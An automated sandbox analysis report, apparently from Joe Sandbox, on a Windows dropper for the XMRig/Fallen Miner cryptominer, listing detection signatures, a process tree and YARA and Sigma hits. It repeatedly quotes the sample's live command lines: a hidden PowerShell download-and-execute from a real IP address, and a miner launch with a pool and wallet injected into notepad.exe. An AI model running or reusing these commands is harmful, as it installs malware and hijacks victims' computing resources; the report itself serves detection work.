Edit tour

Windows Analysis Report
yjYJ8QncaF.exe

Overview

General Information

Sample name:	yjYJ8QncaF.exe renamed because original name is a hash value
Original sample name:	5b3ed060facb9d57d8d0539084686870.exe
Analysis ID:	1630727
MD5:	5b3ed060facb9d57d8d0539084686870
SHA1:	9cae8c44e44605d02902c29519ea4700b4906c76
SHA256:	7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
Tags:	exeuser-abuse_ch
Infos:

Detection

Fallen Miner, Xmrig

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Xmrig

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Fallen Miner

Yara detected Xmrig cryptocurrency miner

Allocates memory in foreign processes

Bypasses PowerShell execution policy

Compiles code for process injection (via .Net compiler)

Connects to a pastebin service (likely for C&C)

Creates a thread in another existing process (thread injection)

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Joe Sandbox ML detected suspicious sample

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Notepad Making Network Connection

Sigma detected: Potential Crypto Mining Activity

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

yjYJ8QncaF.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\yjYJ8QncaF.exe" MD5: 5B3ED060FACB9D57D8D0539084686870)

cmd.exe (PID: 7356 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7408 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 7836 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

wscript.exe (PID: 1848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3168 cmdline: timeout /t 30 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

powershell.exe (PID: 2664 cmdline: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7320 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7356 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

notepad.exe (PID: 2568 cmdline: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40 MD5: 27F71B12CB585541885A31BE22F61C83)

tasklist.exe (PID: 7700 cmdline: tasklist /FI "PID eq 2568" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7844 cmdline: tasklist /FI "PID eq 2568" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 8120 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 2312 cmdline: C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 1076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

explorer.exe (PID: 6592 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 5840 cmdline: C:\Windows\system32\WerFault.exe -u -p 6592 -s 7472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

explorer.exe (PID: 4824 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://harfanglab.io/insidethelab/unpacking-packxor/ https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
sslproxydump.pcap	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5e02cf:$a1: mining.set_target 0xce4c46:$a1: mining.set_target 0x5da785:$a2: XMRIG_HOSTNAME 0xcdf188:$a2: XMRIG_HOSTNAME 0x5dca9d:$a3: Usage: xmrig [OPTIONS] 0xce1414:$a3: Usage: xmrig [OPTIONS] 0x5da75d:$a4: XMRIG_VERSION 0xcdf160:$a4: XMRIG_VERSION

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2584264262.000000C000222000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x87f710:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x47a470:$a1: mining.set_target 0x474e58:$a2: XMRIG_HOSTNAME 0x476f40:$a3: Usage: xmrig [OPTIONS] 0x474e30:$a4: XMRIG_VERSION
00000009.00000002.2568842224.0000000057B10000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_FallenMiner	Yara detected Fallen Miner	Joe Security
00000009.00000000.1906536489.0000000010890000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x87f710:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x8fc70:$a1: mining.set_target 0x8a658:$a2: XMRIG_HOSTNAME 0x8c740:$a3: Usage: xmrig [OPTIONS] 0x8a630:$a4: XMRIG_VERSION
00000009.00000002.2562842128.0000000010890000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x87f710:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000009.00000002.2563552633.0000000011120000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_FallenMiner	Yara detected Fallen Miner	Joe Security
Process Memory Space: powershell.exe PID: 7408	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x223b7a:$b2: ::FromBase64String( 0x651eb:$s1: -join 0x722c0:$s1: -join 0x75692:$s1: -join 0x75d44:$s1: -join 0x77835:$s1: -join 0x79a3b:$s1: -join 0x7a262:$s1: -join 0x7aad2:$s1: -join 0x7b20d:$s1: -join 0x7b23f:$s1: -join 0x7b287:$s1: -join 0x7b2a6:$s1: -join 0x7baf6:$s1: -join 0x7bc72:$s1: -join 0x7bcea:$s1: -join 0x7bd7d:$s1: -join 0x7bfe3:$s1: -join 0x7e179:$s1: -join 0x8cbc3:$s1: -join 0xa230b:$s1: -join
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.explorer.exe.c000252000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.2.explorer.exe.c000252000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x23d070:$a1: mining.set_target 0x237a58:$a2: XMRIG_HOSTNAME 0x239b40:$a3: Usage: xmrig [OPTIONS] 0x237a30:$a4: XMRIG_VERSION
9.2.explorer.exe.c000252000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x2440e1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
9.2.explorer.exe.c000252000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x2445b0:$s1: %s/%s (Windows NT %lu.%lu 0x245630:$s3: \\.\WinRing0_ 0x23bd38:$s4: pool_wallet 0x2372a8:$s5: cryptonight 0x2372b8:$s5: cryptonight 0x2372c8:$s5: cryptonight 0x2372d8:$s5: cryptonight 0x2372f0:$s5: cryptonight 0x237300:$s5: cryptonight 0x237310:$s5: cryptonight 0x237328:$s5: cryptonight 0x237338:$s5: cryptonight 0x237350:$s5: cryptonight 0x237368:$s5: cryptonight 0x237378:$s5: cryptonight 0x237388:$s5: cryptonight 0x237398:$s5: cryptonight 0x2373b0:$s5: cryptonight 0x2373c8:$s5: cryptonight 0x2373d8:$s5: cryptonight 0x2373e8:$s5: cryptonight
9.2.explorer.exe.c000af2000.3.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
9.2.explorer.exe.c000af2000.3.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x586c70:$a1: mining.set_target 0x581658:$a2: XMRIG_HOSTNAME 0x583740:$a3: Usage: xmrig [OPTIONS] 0x581630:$a4: XMRIG_VERSION
9.2.explorer.exe.c000af2000.3.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x58dce1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
9.2.explorer.exe.c000af2000.3.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x58e1b0:$s1: %s/%s (Windows NT %lu.%lu 0x58f230:$s3: \\.\WinRing0_ 0x585938:$s4: pool_wallet 0x580ea8:$s5: cryptonight 0x580eb8:$s5: cryptonight 0x580ec8:$s5: cryptonight 0x580ed8:$s5: cryptonight 0x580ef0:$s5: cryptonight 0x580f00:$s5: cryptonight 0x580f10:$s5: cryptonight 0x580f28:$s5: cryptonight 0x580f38:$s5: cryptonight 0x580f50:$s5: cryptonight 0x580f68:$s5: cryptonight 0x580f78:$s5: cryptonight 0x580f88:$s5: cryptonight 0x580f98:$s5: cryptonight 0x580fb0:$s5: cryptonight 0x580fc8:$s5: cryptonight 0x580fd8:$s5: cryptonight 0x580fe8:$s5: cryptonight
Click to see the 3 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, ProcessId: 2568, ProcessName: notepad.exe

System Summary

Sigma detected: Notepad Making Network Connection

Source: Network Connection

Author: EagleEye Team: Data: DestinationIp: 192.248.189.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

Sigma detected: Potential Crypto Mining Activity

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, ProcessId: 2568, ProcessName: notepad.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , ProcessId: 1848, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", ProcessId: 7836, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat

Sigma detected: PowerShell Web Download

Source: Process started

